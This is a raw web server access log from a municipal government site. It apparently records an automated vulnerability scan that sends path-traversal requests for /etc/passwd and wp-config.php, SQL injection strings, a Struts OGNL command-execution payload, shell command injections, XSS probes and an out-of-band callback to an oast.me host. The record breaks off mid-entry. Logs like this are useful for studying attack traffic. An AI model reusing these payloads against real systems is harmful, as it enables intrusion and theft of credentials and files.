编辑当前文件:/home2/sdektunc/access-logs/chocholayucatan.sdektun.com-ssl_log
89.185.25.131 - - [01/Feb/2025:06:09:39 -0600] "GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:19:58 -0600] "GET /render/info.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:00 -0600] "GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.21 (KHTML, like Gecko) Version/17.0 Safari/616.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:00 -0600] "GET /%255c%255ccudo29mjalo72u293ingfr4ixmyej4834.oast.me%255cC$%255cbb HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:02 -0600] "GET /assets/built%2F..%2F..%2F/package.json HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:05 -0600] "GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:06 -0600] "GET /api/geojson?url=file:///c://windows/win.ini HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - 
[01/Feb/2025:06:20:06 -0600] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:07 -0600] "GET /assets/built%252F..%252F..%252F%25E0%25A4%25A/package.json HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:08 -0600] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:20:10 -0600] "GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:12 -0600] "GET /cuenta.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" www.chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:13 -0600] "GET /cpublica.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Yahoo! 
Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" www.chocholayucatan.gob.mx 192.185.131.128 185.153.151.177 - - [01/Feb/2025:06:44:13 -0600] "GET /archivos/2020/cuenta/cuentaanual.pdf HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)" www.chocholayucatan.gob.mx 192.185.131.128 17.241.219.217 - - [01/Feb/2025:06:55:13 -0600] "GET / HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)" www.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:06:56:30 -0600] "GET /icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:08 -0600] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:08 -0600] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /cgi-bin/masterCGI?ping=nomip&user=;id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /info/dir?/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 
chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:10 -0600] "GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:14 -0600] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1" 409 83 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:14 -0600] "GET /excel.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/618.6 (KHTML, like Gecko) Version/17.2 Safari/618.6" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:07:26:17 -0600] "GET /admin/ajax/avatar.php?id=-1+union+select+md5(999999999)%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.61" chocholayucatan.gob.mx 192.185.131.128 51.81.46.212 - - [01/Feb/2025:07:51:50 -0600] "GET / HTTP/1.1" 401 35 "-" "-" webdisk.chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:35 -0600] "GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:47 -0600] "GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:47 -0600] "GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:49 -0600] "GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:51 -0600] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:18:53 -0600] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:03 -0600] "POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%e2%80%99%e2%80%99%26type%3d HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:04 -0600] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - 
[01/Feb/2025:08:40:05 -0600] "GET /system/config_menu.htm HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:05 -0600] "GET /_admin/imgdownload.php?filename=imgdownload.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:06 -0600] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:08 -0600] "GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:10 -0600] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:11 -0600] 
"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:08:40:23 -0600] "GET /xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:07:31 -0600] "GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 51.8.102.233 - - [01/Feb/2025:09:20:25 -0600] "GET /robots.txt HTTP/2.0" 200 90 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:45 -0600] "GET /wan.htm HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "POST 
/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:46 -0600] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:47 -0600] "GET /cgi-bin/config.exp HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:47 -0600] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET 
/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:48 -0600] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 406 226 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:49 -0600] "GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:50 -0600] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:52:50 -0600] "GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.7.24" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:08 -0600] "GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, 
like Gecko) Version/17.3.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:08 -0600] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:09:53:15 -0600] "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:06 -0600] "GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:48 -0600] "GET /assets/elFinder/elfinder.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:50 -0600] "GET /backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:52 -0600] "GET /elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:56 -0600] "GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:57 -0600] "GET 
/uploads/assets/backend/elfinder/elfinder.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.20" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:38:58 -0600] "GET /uploads/elfinder/elfinder-cke.html HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:43:37 -0600] "GET /api/scrape/kube-system HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:43:42 -0600] "GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9320169)))),0x7e),3550) HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:32 -0600] "GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 404 4677 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:33 -0600] "GET /manage/fileDownloader?sec=1 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:34 -0600] "GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:35 -0600] "GET /api/ping/;%60id%60 HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 
Safari/537.3" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /cgi-bin/live_api.cgi?page=hqy&id=6&ip=;id; HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /?url=
HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/618.17.9 (KHTML, like Gecko) Version/17.4 Safari/618.17.9" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:37 -0600] "GET /?layout=/etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 406 226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /api/v1/serverinfo HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:10:51:38 -0600] "GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:45 -0600] "GET /static/link/%2e%2e/etc/passwd HTTP/1.1" 200 25712 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:45 -0600] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 400 25712 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" chocholayucatan.gob.mx 192.185.131.128 89.185.25.131 - - [01/Feb/2025:11:41:47 -0600] "GET 
